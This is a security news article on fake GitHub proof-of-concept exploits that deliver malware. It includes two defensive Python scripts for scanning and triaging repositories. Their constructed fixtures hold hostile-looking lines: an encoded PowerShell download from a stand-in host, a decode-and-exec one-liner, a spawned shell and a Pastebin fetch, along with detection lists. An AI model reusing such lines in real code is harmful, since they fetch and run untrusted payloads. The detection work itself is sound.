
Thousands of GitHub repositories provide fake PoC hacks with malware



Researchers at the Leiden Institute for Advanced Computer Science have found thousands of repositories on GitHub that offer fake Proof of Concept (PoC) exploits for a wide range of security vulnerabilities, some of which include malware.


GitHub is one of the largest code hosting platforms, and researchers use it to publish PoC exploits for vulnerabilities so that the security community can verify fixes or gauge the impact and scope of a flaw.





According to a technical paper by researchers at the Leiden Institute for Advanced Computer Science, the probability of being infected with malware instead of obtaining a working PoC could be as high as 10.3%, not counting repositories that were merely fakes or counterfeit programs.






Data collection and analysis




The researchers analyzed just over 47,300 repositories that advertised an exploit for a vulnerability disclosed between 2017 and 2021, using the following three mechanisms:


  • IP address analysis: comparing the PoC publisher's IP addresses against public blocklists, VirusTotal (VT), and AbuseIPDB.
  • Binary analysis: running VirusTotal checks on the executables found and hashing them.
  • Hexadecimal and Base64 analysis: decoding obfuscated files before performing the binary and IP checks.
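As an added illustration of the three mechanisms (this is example code written for this article, not the researchers' tooling or the paper's code), the script below runs them over a constructed sample repository: it extracts IPv4 addresses from every file, peels base64 and hex layers recursively and re-scans the decoded content, hashes anything that looks like a PE or ELF binary, and compares the results against local stand-ins for the blocklist and VirusTotal lookups. The addresses are from the documentation ranges, the "binary" is a fake PE header, and the blocklist and hash set are constructed; a real run would query the external services instead.

```python
import base64
import binascii
import hashlib
import ipaddress
import re

# Constructed sample repository. The addresses come from the documentation
# ranges (TEST-NET-1/2/3) and the "binary" is a stand-in PE header; none of
# these are real indicators.
_STAGE1 = base64.b64encode(b"powershell -c iwr http://198.51.100.23/x.vbs").decode()
_STAGE2_HEX = binascii.hexlify(b"c2=192.0.2.44:8443").decode()
_STAGE2 = base64.b64encode(_STAGE2_HEX.encode()).decode()      # hex wrapped in base64

SAMPLE_REPO = {
    "README.md": b"# CVE-XXXX-XXXX PoC (constructed placeholder)\nUsage: python exploit.py <target>\n",
    "exploit.py": (
        "import socket\n"
        "TARGET = '203.0.113.7'\n"      # plain-text address
        f"STAGE1 = '{_STAGE1}'\n"       # one base64 layer hiding a download URL
        f"STAGE2 = '{_STAGE2}'\n"       # two layers: base64(hex(...))
    ).encode(),
    "tool.exe": b"MZ\x90\x00" + b"\x00" * 60,
}

# Local stand-ins for the reputation sources the paper queried (public
# blocklists, VirusTotal, AbuseIPDB). Constructed for this example only.
IP_BLOCKLIST = {"198.51.100.23", "192.0.2.44"}
KNOWN_BAD_SHA256 = {hashlib.sha256(SAMPLE_REPO["tool.exe"]).hexdigest()}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
HEX_RE = re.compile(r"\b(?:[0-9a-fA-F]{2}){8,}\b")


def _mostly_printable(data: bytes) -> bool:
    """Decoded layers that are mostly text are kept; binary garbage is discarded."""
    if not data:
        return False
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data) >= 0.9


def extract_ips(text: str) -> set:
    """Syntactically valid IPv4 addresses in text; loopback and 0.0.0.0 dropped.
    Caveat: a version string such as 1.2.3.45 also matches, so results need
    the reputation lookup before they mean anything."""
    found = set()
    for m in IPV4_RE.findall(text):
        try:
            ip = ipaddress.IPv4Address(m)
        except ValueError:           # e.g. 1.2.3.456 is not an address
            continue
        if not (ip.is_loopback or ip.is_unspecified):
            found.add(str(ip))
    return found


def decode_layers(text: str, depth: int = 3) -> list:
    """Peel base64 and hex layers, recursing into each decoded layer up to `depth`."""
    if depth == 0:
        return []
    candidates = []
    for m in B64_RE.findall(text):
        if len(m) % 4 == 0:
            try:
                candidates.append(base64.b64decode(m, validate=True))
            except (binascii.Error, ValueError):
                pass
    for m in HEX_RE.findall(text):
        try:
            candidates.append(binascii.unhexlify(m))
        except (binascii.Error, ValueError):
            pass
    decoded = []
    for blob in candidates:
        if _mostly_printable(blob):
            layer = blob.decode("ascii", errors="replace")
            decoded.append(layer)
            decoded.extend(decode_layers(layer, depth - 1))
    return decoded


def hash_executables(files: dict) -> dict:
    """SHA-256 of every file with a PE or ELF magic; the key used for a VirusTotal lookup."""
    return {name: hashlib.sha256(data).hexdigest()
            for name, data in files.items()
            if data.startswith(b"MZ") or data.startswith(b"\x7fELF")}


def analyze_repo(files: dict) -> dict:
    """Run the IP, binary and encoding checks over one repository."""
    ips, layers = set(), {}
    for name, data in files.items():
        text = data.decode("utf-8", errors="ignore")
        ips |= extract_ips(text)
        decoded = decode_layers(text)
        if decoded:
            layers[name] = decoded
            for layer in decoded:
                ips |= extract_ips(layer)     # addresses hidden behind encoding
    hashes = hash_executables(files)
    return {
        "ips": sorted(ips),
        "blocklisted_ips": sorted(ips & IP_BLOCKLIST),
        "decoded_layers": layers,
        "executables": hashes,
        "flagged_executables": sorted(n for n, h in hashes.items() if h in KNOWN_BAD_SHA256),
    }


def is_suspicious(report: dict) -> bool:
    return bool(report["blocklisted_ips"] or report["flagged_executables"])


if __name__ == "__main__":
    import json
    print(json.dumps(analyze_repo(SAMPLE_REPO), indent=2))
```

The printability filter is what keeps the decoder from drowning in false positives: long identifiers and SHA-256 hashes in comments also match the base64 and hex patterns, but they decode to binary garbage and are discarded, while a real second layer decodes to text and is scanned again.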




Of the 150,734 unique IP addresses extracted, 2,864 matched entries in the blocklist, 1,522 were flagged as malicious by antivirus scans on VirusTotal, and 1,069 were present in the AbuseIPDB database.








The binary analysis examined a set of 6,160 executables and revealed a total of 2,164 malicious samples hosted in 1,398 repositories.


In total, 4,893 of the 47,313 repositories tested were deemed malicious, most of them related to vulnerabilities from 2020.




The report lists a small set of repositories with fake PoCs that deliver malware. However, the researchers shared with BleepingComputer at least 60 other examples that are still live and in the process of being removed by GitHub.




Malware in PoC



Looking closely at some of these cases, the researchers found a wide variety of malware and malicious scripts, ranging from remote access Trojans to Cobalt Strike.




One interesting case is a PoC for CVE-2019-0708, known as "BlueKeep", which contains a base64-obfuscated Python script that fetches a VBScript from Pastebin.


The script is Houdini RAT, an old JavaScript-based Trojan that supports remote command execution via Windows CMD.





In another case, the researchers discovered a fake PoC that was actually an information stealer collecting system information, the IP address, and the user agent.


This had previously been created as a security experiment by another researcher, so finding it with the automated tool confirmed to the researchers that their approach was working.



One of the researchers, Yadmani Sufyan, who is also a security researcher at Darktrace, kindly provided BleepingComputer with additional examples not included in the technical report, which are given below:


  • A PowerShell PoC containing a base64-encoded binary that has been flagged as malicious on VirusTotal.
  • A Python PoC with a single line that decodes a base64-encoded payload that has been flagged as malicious on VirusTotal.
  • A fake BlueKeep exploit containing an executable that most antivirus engines flag as malicious and identify as Cobalt Strike.
  • A hidden script inside a fake PoC that contains dormant malicious components which its author could activate at will.




How to keep yourself safe



Blindly trusting a GitHub repository from an unverified source is a bad idea: the content is not moderated, so it is up to users to review it before using it.


Software testers are advised to carefully scrutinize the PoCs they download and to run as many checks as possible before executing them.


Sufyan believes that all testers should follow these three steps:


  • Carefully read the code you are about to run on your network or your client's network.
  • If the code is too obfuscated and parsing it manually would take a lot of time, run it in a sandboxed environment (e.g. an isolated virtual machine) and check your network for any suspicious traffic.
  • Use open source intelligence tools such as VirusTotal to analyze binaries.
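The first step, reading the code, can be given a head start with a static triage pass that points at the lines worth reading first. The script below is an added example for this article (not the researchers' tool or anything the article describes as such) that parses a Python PoC with the standard `ast` module and scores the patterns the article names: a single line that decodes data and hands it to `exec`, a download from a paste site, a spawned shell, and large embedded base64 blobs. The red-flag call names, the paste-host list, the weights and the verdict thresholds are assumptions chosen for the example; the two PoC sources are constructed (the "payload" the suspicious one decodes is just `print('hi')`), and nothing in them is executed, only parsed.

```python
import ast
import re

# Constructed samples, not real exploits. The first mimics the red flags the
# article describes; the second is an ordinary connectivity probe.
SUSPICIOUS_POC = '''
import base64, subprocess, urllib.request

def check(host):
    # looks like an innocent version probe against the target
    return urllib.request.urlopen(f"http://{host}:8080/version").read()

exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
subprocess.Popen(["cmd.exe", "/c", "whoami"])
data = urllib.request.urlopen("https://pastebin.com/raw/PLACEHOLDER").read()
'''

BENIGN_POC = '''
import socket, sys

def probe(host, port=445):
    """Report whether the target port accepts a TCP connection."""
    s = socket.create_connection((host, port), timeout=3)
    s.close()
    return True

if __name__ == "__main__":
    print(probe(sys.argv[1]))
'''

# Callee names treated as red flags: an assumption for this example, extend as
# needed. Plain socket use is not listed because a PoC is expected to talk to
# its target; fetching code from the internet is what stands out.
DECODERS = {"base64.b64decode", "base64.b64decode", "binascii.unhexlify",
            "bytes.fromhex", "zlib.decompress", "codecs.decode"}
FETCHERS = {"urllib.request.urlopen", "urlopen", "requests.get", "requests.post"}
SPAWNERS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
            "subprocess.check_output", "os.system", "os.popen"}
PASTE_HOSTS = ("pastebin.com",)                       # the host named in the article
URL_RE = re.compile(r"https?://[\w.-]+")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def _call_name(node: ast.Call) -> str:
    """Dotted callee name such as 'base64.b64decode' or 'exec'; '' for method chains."""
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if not isinstance(f, ast.Name):
        return ""
    parts.append(f.id)
    return ".".join(reversed(parts))


def triage(source: str) -> dict:
    """Static pre-execution triage: weighted findings, a score and a verdict."""
    tree = ast.parse(source)
    findings, urls = [], []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in ("exec", "eval"):
                arg = node.args[0] if node.args else None
                # exec of anything other than a literal string is computed code
                if not (isinstance(arg, ast.Constant) and isinstance(arg.value, str)):
                    inner = {_call_name(c) for c in ast.walk(node) if isinstance(c, ast.Call)}
                    if inner & DECODERS:
                        findings.append((node.lineno, 5, "decode-and-exec one-liner"))
                    else:
                        findings.append((node.lineno, 3, f"{name}() of computed data"))
            elif name in DECODERS:
                findings.append((node.lineno, 1, f"decoding layer: {name}"))
            elif name in FETCHERS:
                findings.append((node.lineno, 2, f"remote fetch: {name}"))
            elif name in SPAWNERS:
                findings.append((node.lineno, 2, f"process spawn: {name}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            s = node.value
            if URL_RE.match(s):
                urls.append(s)
                if any(h in s for h in PASTE_HOSTS):
                    findings.append((node.lineno, 3, f"download from paste site: {s}"))
            elif B64_BLOB.fullmatch(s):
                findings.append((node.lineno, 2, f"embedded base64 blob ({len(s)} chars)"))
    findings.sort()
    score = sum(w for _, w, _ in findings)
    if score >= 8:
        verdict = "do not run outside an isolated sandbox; watch for outbound traffic"
    elif score >= 3:
        verdict = "read every flagged line before running"
    else:
        verdict = "no obvious red flags; still review the code"
    return {"score": score, "verdict": verdict, "findings": findings, "urls": urls}


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_POC), ("benign", BENIGN_POC)):
        report = triage(src)
        print(f"[{label}] score={report['score']}: {report['verdict']}")
        for lineno, weight, what in report["findings"]:
            print(f"  line {lineno} (+{weight}): {what}")
```

The output is a reading list, not a verdict on malice: a flagged `exec` may be legitimate, but it is the line to understand before the code touches a client network, and a high score is the cue to move to the second step and run the PoC only inside an isolated virtual machine while watching its traffic.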



The researchers reported all the malicious repositories they found to GitHub, but reviewing and removing all of them will take time, so many are still publicly available.




As Sufyan explained, their study is intended not only as a one-time cleanup of GitHub but also as a catalyst for developing an automated solution that can flag malicious instructions in uploaded code.





